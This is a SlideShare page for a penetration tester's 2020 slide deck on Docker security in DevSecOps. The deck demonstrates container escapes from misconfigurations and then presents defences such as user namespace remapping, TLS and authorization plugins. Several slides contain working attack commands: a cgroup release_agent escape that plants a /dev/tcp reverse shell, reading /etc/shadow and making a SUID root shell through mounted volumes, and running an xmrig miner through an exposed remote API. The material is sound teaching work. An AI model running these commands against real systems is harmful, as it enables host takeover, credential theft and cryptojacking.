PM
Uploaded byPichaya Morimoto
PDF, PPTX1,051 views

Docker Plugin For DevSecOps

The document outlines a Docker plugin for DevSecOps, developed by Mr. Peeranat Thantaletong, focusing on security issues such as container breakout vulnerabilities, software misconfigurations, and authorization plugins. It discusses various configurations and commands that expose security weaknesses within Docker, including running privileged containers and mounting sensitive volumes. Additionally, it emphasizes the importance of using user namespaces to enhance security within Docker environments.

Embed presentation

Download as PDF, PPTX
บจก.สยามถนัดแฮก Responsible: Mr. Peeranat Thantaletong Version (Date): 1.0 (2020-01-25) Confidentiality class: Public Docker Plugin for DevSecOps
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public $ whoami Mr. Peeranat Thantaletong (Por) Penetration Tester Siam Thanat Hack Company Limited - Offensive Security Certified Professional (OSCP) - CompTIA PenTest+ บจก.สยามถนัดแฮก 2
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Agenda - Docker in DevSecOps - Container Breakout - Software Vulnerabilities - Security Misconfigurations - Linux User Namespace - Low-privileged Container - Docker Authorization Plugin 3
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public DevSecOps 4 Image source: https://medium.com/@krissconnect/%E0%B8%A1%E0%B8%B2%E0%B8%97%E0%B8%B3-devsecops-%E0%B8%81%E0%B8%B1%E0%B8%9 9%E0%B9%80%E0%B8%96%E0%B8%AD%E0%B8%B0-63dfe3ed11fb
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public DevSecOps Tools 5
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Docker 6Image source: https://www.docker.com/blog/docker-101-introduction-docker-webinar-recap/
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Container Breakout RunC Container Escape Vulnerability (CVE-2019-5736) ? 7Image source: https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Container Breakout 8
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Escape Container via Security Misconfigurations 9
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 1: Running Container with --privileged $ docker run --rm -it --privileged ubuntu bash --privileged flag: When using this flag, containers have full access to all devices and lack restrictions from seccomp, AppArmor, and Linux capabilities. 10
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 1: Running Container with --privileged $ docker run -it --privileged -v /usr/bin/nc:/usr/bin/nc ubuntu bash root@18ea7c42f8f2:/# mkdir /tmp/cgrp root@18ea7c42f8f2:/# mount -t cgroup -o rdma cgroup /tmp/cgrp root@18ea7c42f8f2:/# mkdir /tmp/cgrp/x root@18ea7c42f8f2:/# echo 1 > /tmp/cgrp/x/notify_on_release root@18ea7c42f8f2:/# host_path=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab` root@18ea7c42f8f2:/# echo "$host_path/shell.sh" > /tmp/cgrp/release_agent root@18ea7c42f8f2:/# cat /tmp/cgrp/release_agent /var/lib/docker/overlay2/0ddbdfdf4086bbb587e71efed95df8583f8b90aee419fd c5d346156f8d08cc6c/diff/shell.sh 11
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 1: Running Container with --privileged root@18ea7c42f8f2:/# echo '#!/bin/sh' > /shell.sh root@18ea7c42f8f2:/# echo '/bin/bash -c "/bin/bash -i >& /dev/tcp/172.17.0.2/9999 0>&1"' >> /shell.sh root@18ea7c42f8f2:/# chmod a+x /shell.sh $ cat /var/lib/docker/overlay2/0ddbdfdf4086bbb587e71efed95df8583f8b90aee419fd c5d346156f8d08cc6c/diff/shell.sh #!/bin/sh /bin/bash -c "/bin/bash -i >& /dev/tcp/172.17.0.2/9999 0>&1" 12
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 1: Running Container with --privileged root@18ea7c42f8f2:/# sleep 2 && sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs" & root@18ea7c42f8f2:/# nc -lvp 9999 listening on [any] 9999 ... 172.17.0.1: inverse host lookup failed: Unknown host connect to [172.17.0.2] from (UNKNOWN) [172.17.0.1] 33652 bash: cannot set terminal process group (-1): Inappropriate ioctl for device bash: no job control in this shell root@parrot:/# 13
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 2: Excessive Capabilities $ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash The --cap-add=SYS_ADMIN flag allows a container to perform the mount syscall. Use the --security-opt apparmor=unconfined flag to start a container without an AppArmor profile. *Docker starts containers with the docker-default AppArmor policy by default, which prevents the use of the mount syscall even when the container is run with SYS_ADMIN. 14
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 3: Mount Sensitive Volumes #1 dev01@parrot:~$ docker run -it -v /:/mnt/host --rm alpine sh / # cat /mnt/host/etc/shadow root:$6$jvHBn8UTWequ.Rn5$TxgN48QEo7FEWgSvmgrmrXeTMULpmc6EOxSv h4pliCVwg4Vmd3ODpAz.ICbSz6L3P7RK0lDUP.IVSRckRU9Ss.:18040:0:99999:7 ::: daemon:*:18011:0:99999:7::: bin:*:18011:0:99999:7::: [...] 15
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 3: Mount Sensitive Volumes #1 dev01@parrot:~$ docker run -it -v /:/mnt/host --rm alpine sh / # cp /mnt/host/bin/bash /mnt/host/tmp/bashsuid / # chmod a+sx /mnt/host/tmp/bashsuid / # exit dev01@parrot:~$ /tmp/bashsuid -p bashsuid-5.0# id uid=1002(dev01) gid=1002(dev01) euid=0(root) egid=0(root) groups=0(root),997(docker),1002(dev01) 16
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 4: Mount Sensitive Volumes #2 dev01@parrot:~$ docker run --rm -it -v /var/run/docker.sock:/var/run/docker.sock -v /usr/bin/docker:/usr/bin/docker ubuntu bash root@18ea7c42f8f2:/# docker run -it --privileged -v /usr/bin/nc:/usr/bin/nc ubuntu bash root@9121d1d3663f:/# mkdir /tmp/cgrp root@9121d1d3663f:/# mount -t cgroup -o rdma cgroup /tmp/cgrp root@9121d1d3663f:/# mkdir /tmp/cgrp/x root@9121d1d3663f:/# echo 1 > /tmp/cgrp/x/notify_on_release root@9121d1d3663f:/# host_path=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab` root@9121d1d3663f:/# echo "$host_path/shell.sh" > /tmp/cgrp/release_agent 17
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 4: Mount Sensitive Volumes #2 root@9121d1d3663f:/# echo '#!/bin/sh' > /shell.sh root@9121d1d3663f:/# echo '/bin/bash -c "/bin/bash -i >& /dev/tcp/172.17.0.2/9999 0>&1"' >> /shell.sh root@9121d1d3663f:/# chmod a+x /shell.sh root@9121d1d3663f:/# sleep 2 && sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs" & root@9121d1d3663f:/# nc -lvp 9999 listening on [any] 9999 ... root@parrot:/# 18
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 5: Docker Remote API Exposure Enable the remote API for dockerd $ cat /lib/systemd/system/docker.service [...] ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H fd:// --containerd=/run/containerd/containerd.sock [...] $ systemctl daemon-reload $ service docker restart 19
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 5: Docker Remote API Exposure $ docker -H 192.168.1.2:2375 run xmrig/xmrig -o xmr.crypto-pool.fr:443 -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URn RoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD -p x --donate-level=1 20 Image source: https://cyware.com/news/monero-site-hack-how-hackers-distributed-cryptocurrency-stealing-malware-e3366e2b
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 5: Docker Remote API Exposure Image source: https://www.alibabacloud.com/blog/xulu-cryptojacking-leveraging-shodan-tor-and-malicious-docker-container_594869 21
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 5: Docker Remote API Exposure 22
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 5: Docker Remote API Exposure Authentication with TLS Client Certificate $ docker --tlsverify --tlscacert=ca.pem --tlscert=cert.pem --tlskey=key.pem -H=$HOST:2376 version 23Image source: https://dker.ru/docs/component-projects/docker-swarm/overview-docker-swarm-with-tls/
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Low-Privileged Container (host’s root !== container’s root) 24
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Low-Privileged Container 25Image source: https://medium.com/@tonistiigi/experimenting-with-rootless-docker-416c9ad8c0d6
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Low-Privileged Container 26Image source: https://medium.com/@tonistiigi/experimenting-with-rootless-docker-416c9ad8c0d6
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Enable User Namespaces $ useradd -u 200000 temp-ns-root $ groupmod -g 200000 temp-ns-root $ useradd temp-ns $ cat /etc/passwd | grep temp temp-ns-root:x:200000:200000::/home/temp-ns-root:/bin/sh temp-ns:x:1001:1001::/home/temp-ns:/bin/sh Linux User Namespace 27 https://docs.docker.com/engine/security/userns-remap/
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Enable User Namespaces $ cat /etc/subuid temp-ns:200000:65536 $ cat /etc/subgid temp-ns:200000:65536 Linux User Namespace 28
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Enable User Namespaces $ cat /etc/docker/daemon.json { "userns-remap": "temp-ns:temp-ns" } $ systemctl daemon-reload $ systemctl restart docker $ docker info [...] Security Options: userns Linux User Namespace 29
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public $ docker run -it -v /:/mnt/host --rm alpine sh / # cat /proc/self/uid_map 0 200000 65536 / # cat /proc/self/gid_map 0 200000 65536 / # cat /mnt/host/etc/shadow cat: can't open '/mnt/host/etc/shadow': Permission denied / # touch /mnt/host/tmp/remapped / # exit $ ls -la /tmp/remapped -rw-r--r-- 1 temp-ns-root temp-ns-root 0 Jan 23 08:42 /tmp/remapped Linux User Namespace 30
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public $ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined -v /usr/bin/nc:/usr/bin/nc ubuntu bash root@d34335b93113:/# mkdir /tmp/cgrp root@d34335b93113:/# mount -t cgroup -o rdma cgroup /tmp/cgrp mount: /tmp/cgrp: permission denied. Linux User Namespace 31
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public $ docker run -it --userns=host -v /:/mnt/host --rm alpine sh / # touch /mnt/host/tmp/remapped / # exit $ ls -la /tmp/remapped -rw-r--r-- 1 root root 0 Jan 23 08:53 /tmp/remapped Linux User Namespace 32
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Linux User Namespace 33 https://github.com/moby/moby/issues/22223
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Linux User Namespace 34 https://github.com/moby/moby/issues/22223
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public In short, an OS process/service that extends capabilities of Docker Engine. 1. Authorization - Extend API authorization mechanism 2. Network - Extend network management - VXLAN, IPVLAN, MACVLAN, ... 3. Volume - Extend persistent storage - Amazon EBS, ... 4. IPAM - Extend IP address management - DNS, DHCP, ... 5. Graph - Extend image and container fs storage Docker Plugin - What is it? 35
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Register Docker plugin by putting itself in a plugin directory: 1. Unix Domain Socket - /run/docker/plugins/demo.sock 2. URL - /etc/docker/plugins/demo.spec - unix:///other.sock - tcp://localhost:8080 3. JSON Specification - /etc/docker/plugins/demo.json Docker Plugin API 36
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Docker Plugin - Volume plugin for Amazon EBS https://docs.docker.com/engine/extend/EBS_volume/ 37
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Docker Authorization Model (1 - Default) 38
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Docker Authorization Model (2 - with AuthZ Plugin) 39 Image source: https://docs.docker.com/engine/extend/pluginsut_ahorization/
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Example with docker-no-trivial-root Plugin 40 https://github.com/ad-freiburg/docker-no-trivial-root Disabling some trivial ways of gaining root via Docker
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Just A Quick Look At The Code 41https://github.com/ad-freiburg/docker-no-trivial-root
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Just A Quick Look At The Code 42https://github.com/ad-freiburg/docker-no-trivial-root
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public $ ./docker-no-trivial-root & [1] 11552 $ ls -al /run/docker/plugins/ total 0 drwx------ 2 root root 60 Jan 24 05:13 . drwx------ 8 root root 180 Jan 23 09:58 .. srw-rw---- 1 root root 0 Jan 24 05:13 no-trivial-root.sock Docker Authorization Plugin 43
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public $ cat /etc/docker/daemon.json { "authorization-plugins": ["no-trivial-root"] } $ systemctl daemon-reload $ systemctl restart docker Docker Authorization Plugin 44 $ docker info [...] Plugins: Volume: local Network: bridge host ipvlan macvlan null overlay Authorization: no-trivial-root
บจก.สยามถนัดแฮก Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public 45 Any Question ? Contact us: pentest@sth.sh

More Related Content

PDF
Well Testing
byhonculadaangel
 
PDF
Preliminary ship-design
byIndian Maritime University, Visakhapatnam
 
DOCX
Agar plate
byVidya Kalaivani Rajkumar
 
PPTX
Offshore Riser Design
byKon Aguek
 
PPT
Ce154 lecture 3 reservoirs, spillways, & energy dissipators
bySaish Sawant
 
PPTX
Endospore and Exospore
byMicrobiology Notes
 
PDF
Design of small dams
bymytat3
 
PPTX
Types of bioreactors
byMayur D. Chauhan
 
Well Testing
byhonculadaangel
 
Preliminary ship-design
byIndian Maritime University, Visakhapatnam
 
Agar plate
byVidya Kalaivani Rajkumar
 
Offshore Riser Design
byKon Aguek
 
Ce154 lecture 3 reservoirs, spillways, & energy dissipators
bySaish Sawant
 
Endospore and Exospore
byMicrobiology Notes
 
Design of small dams
bymytat3
 
Types of bioreactors
byMayur D. Chauhan
 

More from Pichaya Morimoto

PDF
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
byPichaya Morimoto
 
PDF
Securing and Hacking LINE OA Integration
byPichaya Morimoto
 
PDF
Mysterious Crypto in Android Biometrics
byPichaya Morimoto
 
PDF
Web Hacking with Object Deserialization
byPichaya Morimoto
 
PDF
Burp Extender API for Penetration Testing
byPichaya Morimoto
 
PDF
Bug Bounty แบบแมว ๆ
byPichaya Morimoto
 
PDF
Pentest 101 @ Mahanakorn Network Research Laboratory
byPichaya Morimoto
 
PDF
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
byPichaya Morimoto
 
PDF
Exploiting Blind Vulnerabilities
byPichaya Morimoto
 
PDF
From Web Vulnerability to Exploit in 15 minutes
byPichaya Morimoto
 
PDF
Exploiting WebApp Race Condition Vulnerability 101
byPichaya Morimoto
 
PDF
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
byPichaya Morimoto
 
PDF
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
byPichaya Morimoto
 
PDF
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
byPichaya Morimoto
 
PDF
Art of Web Backdoor - Pichaya Morimoto
byPichaya Morimoto
 
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
byPichaya Morimoto
 
Securing and Hacking LINE OA Integration
byPichaya Morimoto
 
Mysterious Crypto in Android Biometrics
byPichaya Morimoto
 
Web Hacking with Object Deserialization
byPichaya Morimoto
 
Burp Extender API for Penetration Testing
byPichaya Morimoto
 
Bug Bounty แบบแมว ๆ
byPichaya Morimoto
 
Pentest 101 @ Mahanakorn Network Research Laboratory
byPichaya Morimoto
 
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
byPichaya Morimoto
 
Exploiting Blind Vulnerabilities
byPichaya Morimoto
 
From Web Vulnerability to Exploit in 15 minutes
byPichaya Morimoto
 
Exploiting WebApp Race Condition Vulnerability 101
byPichaya Morimoto
 
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
byPichaya Morimoto
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
byPichaya Morimoto
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
byPichaya Morimoto
 
Art of Web Backdoor - Pichaya Morimoto
byPichaya Morimoto
 

Recently uploaded

PDF
SEO in Charleston SC | Local SEO Strategies to Grow Your Business.pdf
bycustomdigitalsolutio1
 
PDF
Purple Team - Active Directory and AzureAD v1
byVICTOR MAESTRE RAMIREZ
 
PDF
JR : Quality Random Data from the Command line
byGiovanni Marigi
 
PPTX
Software Tools for penetration Testing (1).pptx
byAmosCheruiyot13
 
PPT
Waste water treatment plant operation and maintenance
byDuggineniRamakrishna
 
PDF
Using Change Data Capture (CDC) to Ingest Data into Apache Kafka
byGiovanni Marigi
 
PDF
TrustArc Webinar - Unpacking India’s DPDP Act: What You Should Know
byTrustArc
 
PPTX
02_Extended Warehouse Management Functions and Features.pptx
byUdayakumar218983
 
PDF
Governing Agentic Enterprise - From Shadow AI to Autonomous Security.pdf
bysajjasridhar1990
 
PDF
Top 10 Dedicated Server Providers in Stockholm (Updated Edition).pdf
byAtal Networks
 
PDF
A "Kill Switch" (Emergency Off Switch) for AI?
byScott M. Graffius
 
PDF
6 Insights from the Patron Saint of AI Failure
byScott M. Graffius
 
PDF
Best Bank Statement Converter Software - A Documentation-Based Meta-Analysis ...
bylewisconrada
 
PPTX
DVCON24-IBM ai/ml driven hardware verification
byArun Joseph
 
PPTX
JAVA Programming Lecture 1 C 4 Yourself.pptx
byyvsbglfaeahuyldzhq
 
PDF
Mobile Onboarding UX 11 Best Practices for Retention (2026).pdf
byDesign Studio UI UX
 
PPTX
Design Flaws and Known Attacks in Agentic AI - ITI Business Session
byInformation Technology Institute
 
PPTX
Unit 1 Introduction of Computer Networks
bySuvarnaSharma5
 
PDF
Master the FME Connector for ArcGIS: Streamlined Data Management & Robust Met...
bySafe Software
 
PPTX
Lecture 05. API Security for DevSecOps Eng.pptx
byvinocol222
 
SEO in Charleston SC | Local SEO Strategies to Grow Your Business.pdf
bycustomdigitalsolutio1
 
Purple Team - Active Directory and AzureAD v1
byVICTOR MAESTRE RAMIREZ
 
JR : Quality Random Data from the Command line
byGiovanni Marigi
 
Software Tools for penetration Testing (1).pptx
byAmosCheruiyot13
 
Waste water treatment plant operation and maintenance
byDuggineniRamakrishna
 
Using Change Data Capture (CDC) to Ingest Data into Apache Kafka
byGiovanni Marigi
 
TrustArc Webinar - Unpacking India’s DPDP Act: What You Should Know
byTrustArc
 
02_Extended Warehouse Management Functions and Features.pptx
byUdayakumar218983
 
Governing Agentic Enterprise - From Shadow AI to Autonomous Security.pdf
bysajjasridhar1990
 
Top 10 Dedicated Server Providers in Stockholm (Updated Edition).pdf
byAtal Networks
 
A "Kill Switch" (Emergency Off Switch) for AI?
byScott M. Graffius
 
6 Insights from the Patron Saint of AI Failure
byScott M. Graffius
 
Best Bank Statement Converter Software - A Documentation-Based Meta-Analysis ...
bylewisconrada
 
DVCON24-IBM ai/ml driven hardware verification
byArun Joseph
 
JAVA Programming Lecture 1 C 4 Yourself.pptx
byyvsbglfaeahuyldzhq
 
Mobile Onboarding UX 11 Best Practices for Retention (2026).pdf
byDesign Studio UI UX
 
Design Flaws and Known Attacks in Agentic AI - ITI Business Session
byInformation Technology Institute
 
Unit 1 Introduction of Computer Networks
bySuvarnaSharma5
 
Master the FME Connector for ArcGIS: Streamlined Data Management & Robust Met...
bySafe Software
 
Lecture 05. API Security for DevSecOps Eng.pptx
byvinocol222
 

Docker Plugin For DevSecOps

  • 1.
    บจก.สยามถนัดแฮก Responsible: Mr. PeeranatThantaletong Version (Date): 1.0 (2020-01-25) Confidentiality class: Public Docker Plugin for DevSecOps
  • 2.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public $ whoami Mr. Peeranat Thantaletong (Por) Penetration Tester Siam Thanat Hack Company Limited - Offensive Security Certified Professional (OSCP) - CompTIA PenTest+ บจก.สยามถนัดแฮก 2
  • 3.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Agenda - Docker in DevSecOps - Container Breakout - Software Vulnerabilities - Security Misconfigurations - Linux User Namespace - Low-privileged Container - Docker Authorization Plugin 3
  • 4.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public DevSecOps 4 Image source: https://medium.com/@krissconnect/%E0%B8%A1%E0%B8%B2%E0%B8%97%E0%B8%B3-devsecops-%E0%B8%81%E0%B8%B1%E0%B8%9 9%E0%B9%80%E0%B8%96%E0%B8%AD%E0%B8%B0-63dfe3ed11fb
  • 5.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public DevSecOps Tools 5
  • 6.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Docker 6Image source: https://www.docker.com/blog/docker-101-introduction-docker-webinar-recap/
  • 7.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Container Breakout RunC Container Escape Vulnerability (CVE-2019-5736) ? 7Image source: https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/
  • 8.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Container Breakout 8
  • 9.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Escape Container via Security Misconfigurations 9
  • 10.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 1: Running Container with --privileged $ docker run --rm -it --privileged ubuntu bash --privileged flag: When using this flag, containers have full access to all devices and lack restrictions from seccomp, AppArmor, and Linux capabilities. 10
  • 11.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 1: Running Container with --privileged $ docker run -it --privileged -v /usr/bin/nc:/usr/bin/nc ubuntu bash root@18ea7c42f8f2:/# mkdir /tmp/cgrp root@18ea7c42f8f2:/# mount -t cgroup -o rdma cgroup /tmp/cgrp root@18ea7c42f8f2:/# mkdir /tmp/cgrp/x root@18ea7c42f8f2:/# echo 1 > /tmp/cgrp/x/notify_on_release root@18ea7c42f8f2:/# host_path=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab` root@18ea7c42f8f2:/# echo "$host_path/shell.sh" > /tmp/cgrp/release_agent root@18ea7c42f8f2:/# cat /tmp/cgrp/release_agent /var/lib/docker/overlay2/0ddbdfdf4086bbb587e71efed95df8583f8b90aee419fd c5d346156f8d08cc6c/diff/shell.sh 11
  • 12.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 1: Running Container with --privileged root@18ea7c42f8f2:/# echo '#!/bin/sh' > /shell.sh root@18ea7c42f8f2:/# echo '/bin/bash -c "/bin/bash -i >& /dev/tcp/172.17.0.2/9999 0>&1"' >> /shell.sh root@18ea7c42f8f2:/# chmod a+x /shell.sh $ cat /var/lib/docker/overlay2/0ddbdfdf4086bbb587e71efed95df8583f8b90aee419fd c5d346156f8d08cc6c/diff/shell.sh #!/bin/sh /bin/bash -c "/bin/bash -i >& /dev/tcp/172.17.0.2/9999 0>&1" 12
  • 13.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 1: Running Container with --privileged root@18ea7c42f8f2:/# sleep 2 && sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs" & root@18ea7c42f8f2:/# nc -lvp 9999 listening on [any] 9999 ... 172.17.0.1: inverse host lookup failed: Unknown host connect to [172.17.0.2] from (UNKNOWN) [172.17.0.1] 33652 bash: cannot set terminal process group (-1): Inappropriate ioctl for device bash: no job control in this shell root@parrot:/# 13
  • 14.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 2: Excessive Capabilities $ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash The --cap-add=SYS_ADMIN flag allows a container to perform the mount syscall. Use the --security-opt apparmor=unconfined flag to start a container without an AppArmor profile. *Docker starts containers with the docker-default AppArmor policy by default, which prevents the use of the mount syscall even when the container is run with SYS_ADMIN. 14
  • 15.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 3: Mount Sensitive Volumes #1 dev01@parrot:~$ docker run -it -v /:/mnt/host --rm alpine sh / # cat /mnt/host/etc/shadow root:$6$jvHBn8UTWequ.Rn5$TxgN48QEo7FEWgSvmgrmrXeTMULpmc6EOxSv h4pliCVwg4Vmd3ODpAz.ICbSz6L3P7RK0lDUP.IVSRckRU9Ss.:18040:0:99999:7 ::: daemon:*:18011:0:99999:7::: bin:*:18011:0:99999:7::: [...] 15
  • 16.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 3: Mount Sensitive Volumes #1 dev01@parrot:~$ docker run -it -v /:/mnt/host --rm alpine sh / # cp /mnt/host/bin/bash /mnt/host/tmp/bashsuid / # chmod a+sx /mnt/host/tmp/bashsuid / # exit dev01@parrot:~$ /tmp/bashsuid -p bashsuid-5.0# id uid=1002(dev01) gid=1002(dev01) euid=0(root) egid=0(root) groups=0(root),997(docker),1002(dev01) 16
  • 17.
